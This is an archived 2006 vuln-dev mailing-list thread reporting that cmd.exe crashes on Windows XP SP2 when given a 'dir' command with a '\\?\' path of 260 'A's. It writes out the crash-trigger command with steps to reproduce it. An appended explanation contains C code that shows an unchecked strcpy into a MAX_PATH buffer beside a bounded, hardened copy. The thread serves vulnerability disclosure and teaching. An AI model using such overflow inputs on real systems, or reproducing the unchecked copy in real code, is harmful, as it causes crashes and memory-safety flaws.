Vulnerability Development mailing list archives

RE: Windows Command Processor CMD.EXE Buffer Overflow


From: "gregory_panakkal" <gregory_panakkal () fastmail fm>
Date: Sat, 21 Oct 2006 17:52:53 +0530

Hi,

I had tested on a couple of WinXP SP2 fully patched systems; DEP came into
the picture.
On Win2k, cmd.exe immediately terminates; on Vista, no issues, it
throws up a proper error.

Just to clarify whether you executed the command properly: "\\?\" is
required after the dir command, not
the one with the single slash "\?\". To reproduce the issue in WinXP SP2,
copy-paste the command from my original
mail into a Notepad instance; remove the unnecessary line breaks to make
it a single-line command. Now copy-paste
this line into an instance of the command processor and execute it.


On Fri, 20 Oct 2006 15:51:17 -0700, "Marvin Simkin"
<Marvin.Simkin () asu edu> said:
WXPSP2 fully patched:

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>%COMSPEC% /K "dir
\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The filename or extension is too long.

C:\>

... but then, all the command history is lost; you cannot arrow-up to
repeat the command.




-----Original Message-----
From: listbounce () securityfocus com on behalf of Osvaldo Casagrande
Sent: Fri 2006-10-20 04:51
To: gregory_panakkal; vuln-dev () securityfocus com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow
 
It does not work on Windows Vista RC1 (5728)


Osvaldo Casagrande 
MCSE. MCT, MVP, Security+
Gerente de Servicios 
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | ocasagrande () diviserv com

Looking for my references? / Looking for my personal references?
Access to the MVP Program - Access to MS Certifications: under "Transcript ID"
input: 740381 / under "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENTIALITY: The information contained in this mail and its attachments is
confidential and/or privileged and is reserved for the addressee
only. If you are not the addressee or an agent responsible for
delivering this message to the final addressee, you are hereby notified that you may not
use, retransmit, print, copy or disclose the
information contained in this mail or its attachments, or take any
action based on this information. If you have received this message by
mistake, please notify the sender immediately, and be so kind as
to delete it from your computer or any other database. DIVISERV
appreciates your cooperation.

This mail message may contain confidential and/or privileged information
for the addressee. If you are not the addressee or authorized to receive
this for the addressee, you must not use, copy, print, retransmit,
disclose or take any action based on this message or any information
herein. If you have received this message by mistake, please advise the
sender immediately by replying to this message and delete it from your computer
and any database. DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev () securityfocus com
Subject: Windows Command Processor CMD.EXE Buffer Overflow


Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line into cmd.exe and execute it.
(It is a single command; it has been split into multiple lines for
readability's sake.)

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?


-- 
  gregory_panakkal
  gregory_panakkal () fastmail fm

-- 
http://www.fastmail.fm - A fast, anti-spam email service.
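The report in this thread feeds cmd.exe a "\\?\" path followed by 260 'A's and gets a DEP fault on XP SP2. The number 260 is Windows' classic MAX_PATH limit, and the "\\?\" prefix is exactly what lets a path exceed it, so the crash pattern is consistent with a fixed MAX_PATH-sized buffer somewhere in the processing. The following C is an added illustration of that bug class; it is not cmd.exe's code and not code from any poster in the thread, the MAX_PATH definition and all function names are this example's own assumptions, and the test string is constructed the same way as the report's. It shows the weak pattern (an unbounded copy into a MAX_PATH buffer) beside a hardened copy that rejects oversized input instead of overrunning or silently truncating:

```c
/* Added example, not cmd.exe's code: the MAX_PATH bug class that a
   260-character "\\?\" path points at. MAX_PATH = 260 is Windows'
   classic limit; it is defined here as an assumption so the file also
   builds on non-Windows compilers. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef MAX_PATH
#define MAX_PATH 260
#endif

/* Weak pattern: assumes every path fits in MAX_PATH bytes. A "\\?\"
   path is precisely the input that breaks that assumption, so this
   overruns dest whenever strlen(src) >= MAX_PATH. Shown for contrast
   only; never called below. */
void copy_path_unchecked(char dest[MAX_PATH], const char *src)
{
    strcpy(dest, src);
}

/* Hardened: refuse, rather than silently truncate, a path that does
   not fit. memchr stops at the first NUL and never reads past
   dest_size bytes of src, so an oversized or unterminated input cannot
   make the check itself misbehave. Returns 0 on success, -1 with
   errno = ENAMETOOLONG otherwise. */
int copy_path_checked(char *dest, size_t dest_size, const char *src)
{
    const char *nul = memchr(src, '\0', dest_size);
    if (nul == NULL) {          /* no terminator within dest_size bytes */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dest, src, (size_t)(nul - src) + 1);
    return 0;
}

/* 1 if p carries the "\\?\" extended-length prefix, which tells the
   Windows API to skip MAX_PATH normalisation, else 0. */
int has_long_path_prefix(const char *p)
{
    return strncmp(p, "\\\\?\\", 4) == 0;
}

/* Build the report's input: "\\?\" followed by count 'A's. Constructed
   test data; the caller frees the result. */
char *make_prefixed_path(size_t count)
{
    static const char prefix[] = "\\\\?\\";
    size_t plen = sizeof prefix - 1;
    char *p = malloc(plen + count + 1);
    if (p == NULL)
        return NULL;
    memcpy(p, prefix, plen);
    memset(p + plen, 'A', count);
    p[plen + count] = '\0';
    return p;
}

int main(void)
{
    char buf[MAX_PATH];
    char *p = make_prefixed_path(260);   /* 264 bytes plus terminator */
    if (p == NULL)
        return 1;
    printf("length %zu, extended-length prefix: %s\n",
           strlen(p), has_long_path_prefix(p) ? "yes" : "no");
    if (copy_path_checked(buf, sizeof buf, p) != 0)
        printf("rejected: does not fit in a %d-byte buffer (errno %d)\n",
               MAX_PATH, errno);
    else
        printf("copied: %s\n", buf);
    free(p);
    return 0;
}
```

The design choice worth noting is reject versus truncate: a truncating copy (strncpy into MAX_PATH) would stop the overrun but hand the rest of the program a different path than the user typed, which is its own class of bug; returning ENAMETOOLONG keeps the error visible, which is the behaviour the Vista result in this thread ("throws up a proper error") describes.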

